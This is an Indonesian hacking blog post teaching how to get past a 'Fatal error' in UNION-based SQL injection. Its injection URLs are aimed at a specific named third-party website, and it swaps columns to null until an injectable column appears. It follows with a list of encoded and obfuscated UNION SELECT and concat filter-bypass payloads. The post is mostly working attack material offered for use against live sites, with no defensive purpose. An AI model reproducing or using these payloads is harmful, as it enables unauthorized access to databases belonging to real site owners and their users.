Pernahkah kalian , atau jika menemukan penampakkan seperti ini :
ini terjadi pada saya saat UNION SELECT , tapi jangan khawatir kawan. kita lihat yuk cara lewatin begituan hehehe..
saya ada target yang union select nya fatal error. :
http://wwfa.org.uk/article.php?id=-174+union+select+1,2,3,4,5,6,7,8-- ( Fatal error )
supaya bisa menembus Fatal Error tersebut, maka kita lakukan seperti ini :
http://wwfa.org.uk/article.php?id=-174+union+select+1,2,3,4,5,6,7,8-- ( Fatal error )
ubah angka menjadi null secara berurut, seperti ini :
http://wwfa.org.uk/article.php?id=-174 UNION SELECT null,2,3,4,5,6,7,8-- ( Error )
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,null,3,4,5,6,7,8-- ( Error )
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,null,4,5,6,7,8-- ( Error )
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,null,5,6,7,8-- ( Error )
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,null,6,7,8-- ( keluar angka ajaib )
udah gitu ajah sih hehehe..
ada sedikit macam - macam bypass :
Union Select bypassing :
+--+Union+--+Select+--+
+#uNiOn+#sEleCt+
+union+distinct+select+
+union+distinctROW+select+
+union%23aa%0Aselect+
0%a0union%a0select%09
%0Aunion%0Aselect%0A
+UnIoN+SeLselectECT+
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/
+%2F**%2Funion%2F**%2Fselect+
+UnIoN/*&a=*/SeLeCT/*&a=*/
+%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
Concat bypassing :
group_concat()
grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
CoNcAt()
concat()
CoNcAt()
CONCAT(DISTINCT )
concat(0x3a,,0x3c62723e)
/*!50000cOnCat*/
concat_ws()
concat_ws(0x3a,)
CONCAT_WS(CHAR(32,58,32),version(),)
REVERSE(tacnoc)
binary(version())
uncompress(compress(version()))
aes_decrypt(aes_encrypt(version(),1),1)
oke terima kasih semoga bermanfaat ^_^ .
By : Ahmad Fathony
Hadir kembali
ReplyDeleteapanya bang ?
Delete